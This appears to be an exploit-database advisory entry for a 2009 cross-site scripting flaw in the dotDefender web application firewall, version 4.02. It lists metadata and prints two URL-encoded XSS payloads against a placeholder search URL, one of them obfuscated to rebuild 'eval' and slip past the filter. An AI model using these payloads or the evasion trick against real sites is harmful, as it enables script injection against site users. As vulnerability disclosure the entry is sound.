vendor:
dotDefender
by:
David K. (SH4V)
7,5
CVSS
HIGH
Cross-Site Scripting (XSS)
79
CWE
Product Name: dotDefender
Affected Version From: 4.02
Affected Version To: 4.02
Patch Exists: YES
Related CWE: N/A
CPE: a:dotdefender:dotdefender
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
dotDefender XSS Vulnerability
dotDefender is prone to a XSS because it doesn't satinate the input vars correctly. Injecting obfusctated JavaScript code based on references vars assignment, the dotDefender WAF is vulnerable. Blocked: [victim]/search?q=%3Cimg%20src=%22WTF%22%20onError=%22{var%20{3:s,2:h,5:a,0:v,4:n,1:e}=%27earltv%27}[self][0][v%2Ba%2Be%2Bs]%28e%2Bs%2Bv%2Bh%2Bn%29%28/0wn3d/.source%29%22%20/%3E Unblocked: [victim]/search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.source) %20/%3E
Mitigation:
Input validation should be used to sanitize user input and prevent XSS attacks.